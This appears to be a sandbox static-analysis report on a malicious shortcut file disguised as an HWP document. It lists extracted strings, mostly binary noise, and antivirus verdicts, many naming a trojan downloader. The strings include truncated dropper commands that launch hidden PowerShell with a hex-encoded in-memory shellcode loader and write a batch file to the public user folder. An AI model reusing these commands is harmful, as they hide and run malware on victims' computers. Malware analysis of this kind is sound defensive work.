popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
%windir%\SysWOW64\cmd.exe
IDATx^
y N;:S
UV9,kV
7jJ(b%{
S$x4m
^2;.'z
q%c%[!
nq?5_/
R92/;h
LKoXJ/
as)c7.l_Dm
w-Nr_^
bqM;wY
_4T+=
i\O{Q]gM
|uwzhJ
q\KGbw
&Yk1%g
VzmS1
cI!EJk
>_GopJ
YiM/s{~z
.}y!\EmN
-Ywi{tSc
FBA_$/
=:r><.
=TZ:oZrQ
MuGziM
E{7im2'
L&=TRj
< BJLGz
nLG&wz
N|$E@E9w<
zr~qkl
A3iWm6
hZk&d-
Z(bHg>
XXeqpk
J_fN->E
.?i&>de
W<&oqb4
|ls{~z
Y$wH[
we3E(*
3O!<i$NG9
/>LA?S
`ZSM\M
]RErX?
(Y7YER
96Q5W{:E
Me?t3;'
3R*cjb
443F-
C|su/GH
"{ >6F
E,571J>$
#iU3\G
y,>CU
[g\7\jeN
`],k?~
3qK#Z
917LQy
1;P\&9
RG.VSV
Vc[pWS
#96ukw
`)NW>[
@L8|3u
~++~6EG
bzY,6R
C6mW$s4
:EfTi3
_2/uQU
HGM[Y6
3q{~zSyz
2u;_-(
@h'({n[
Uf75_=
{qL}bm
5q,_&\X
|Fj/s;}@
Jk!]hN
$NR)T4
HWP Document File
tEXtSoftware
Adobe ImageReadyq
00pp&30
;20L}l
P[](-0
KJ0fBbC1H
tEXtSoftware
Adobe ImageReadyq
Y.a*%PvdP2
'ad "Y
3#<I3"UM
\m23B#
h]8H<}g
-~83.`=
m|ok'j5y
rsn --
JNXYVM
%]RmHH]
n&[O7fo
TJdk%z
b|'EU_
6BF^pL
%%n`fX
7z:"*'n\
r2xUDg
:w+!zC
`O$>sj
.*d@7:
start /min c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %%a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %%a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D652022414142222
/k echo SET a=power>C:\Users\Public\032310.bat&&echo SET b=shell.exe>>C:\Users\Public\032310.bat&&echo SET M=%a%%b%>>C:\Users\Public\032310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'S
%windir%\SysWOW64\cmd.exe
Root Entry
Root Entry
FileHeader
HwpSummaryInformation
DocInfo
BodyText
BinData
PrvImage
PrvText
DocOptions
Scripts
JScriptVersion
DefaultJScript
_LinkDoc
BIN0001.png
BIN0002.png
Section0
2023.10.03, INKS
9.26~27
(9.28
4:55:39
12, 0, 0, 893 WIN32LEWindows_10
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Agent.4!c
ClamAV Clean
FireEye Heur.BZC.YAX.Pantera.117.429620B2
CAT-QuickHeal Lnk.Trojan.A10352454
Skyhigh BehavesLike.Trojan.vx
McAfee Clean
Malwarebytes Clean
Zillya Trojan.Agent.Script.1741465
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec CL.Downloader!gen119
ESET-NOD32 a variant of Generik.JDNURFO
TrendMicro-HouseCall Clean
Avast LNK:Agent-HS [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.117.429620B2
NANO-Antivirus Clean
ViRobot LNK.S.Agent.53149772
MicroWorld-eScan Clean
TACHYON Clean
Sophos Troj/LnkDrop-M
Baidu Clean
F-Secure Clean
DrWeb Trojan.MulDrop24.1340
VIPRE Heur.BZC.YAX.Pantera.117.429620B2
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.YAX.Pantera.117.429620B2 (B)
Ikarus Trojan.SuspectCRC
GData Heur.BZC.YAX.Pantera.117.429620B2
Jiangmin Clean
Google Detected
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Pantera.117.429620B2
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
Microsoft TrojanDownloader:PowerShell/MoniSaint.C!dha
Varist Clean
AhnLab-V3 Dropper/LNK.Generic.S2373
Acronis Clean
VBA32 Trojan.Link.Crafted
ALYac Trojan.Agent.LNK.Gen
MAX malware (ai score=84)
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious LNK
MaxSecure Clean
Fortinet Clean
AVG LNK:Agent-HS [Trj]
Panda JS/BondatN.gen
No IRMA results available.